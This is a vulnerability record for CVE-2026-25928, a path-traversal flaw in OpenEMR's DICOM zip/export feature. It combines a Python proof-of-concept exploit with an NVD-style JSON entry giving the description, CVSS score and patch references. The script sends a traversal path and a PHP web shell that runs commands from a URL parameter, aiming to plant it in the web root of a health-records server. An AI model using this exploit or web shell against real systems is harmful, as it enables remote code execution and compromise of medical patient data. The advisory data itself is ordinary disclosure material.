CVE-2026-25928

import requests # Target URL of the vulnerable OpenEMR instance target_url = "http://example.com/openemr/interface/dicom/dicom_export.php" # Attacker's session cookie (obtained after login) cookies = { "OpenEMR": "attacker_session_cookie_value" } # Payload exploiting path traversal to write a PHP shell # The application uses the 'path' parameter to determine the zip destination exploit_data = { "path": "../../../../var/www/html/exploit.php", # Path traversal sequence "format": "zip" } # Malicious file content to be written (simple PHP shell) files = { "file": ("exploit.php", "<?php system($_GET['cmd']); ?>", "application/x-php") } try: response = requests.post(target_url, data=exploit_data, files=files, cookies=cookies) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the web root for the shell: http://example.com/exploit.php?cmd=whoami") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2026-25928", "sourceIdentifier": "[email protected]", "published": "2026-03-19T20:16:13.720", "lastModified": "2026-03-20T17:18:35.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.2, the DICOM zip/export feature uses a user-supplied destination or path component when creating the zip file, without sanitizing path traversal sequences (e.g. `../`). An attacker with DICOM upload/export permission can write files outside the intended directory, potentially under the web root, leading to arbitrary file write and possibly remote code execution if PHP or other executable files can be written. Version 8.0.0.2 fixes the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación de código abierto y gratuita para registros de salud electrónicos y gestión de consultorios médicos. Antes de la 8.0.0.2, la función de compresión/exportación DICOM utiliza un destino o componente de ruta proporcionado por el usuario al crear el archivo zip, sin sanear las secuencias de salto de ruta (por ejemplo, '../'). Un atacante con permiso de carga/exportación DICOM puede escribir archivos fuera del directorio previsto, potencialmente bajo la raíz web, lo que lleva a una escritura de archivos arbitraria y posiblemente a una ejecución remota de código si se pueden escribir archivos PHP u otros archivos ejecutables. La versión 8.0.0.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.2", "matchCriteriaId": "C78F19AD-BD18-4F61-8B1C-DD099DBC6D34"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/ddcf04ea769a33cdc1932355224575478df70585", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-rppw-f689-6hrm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}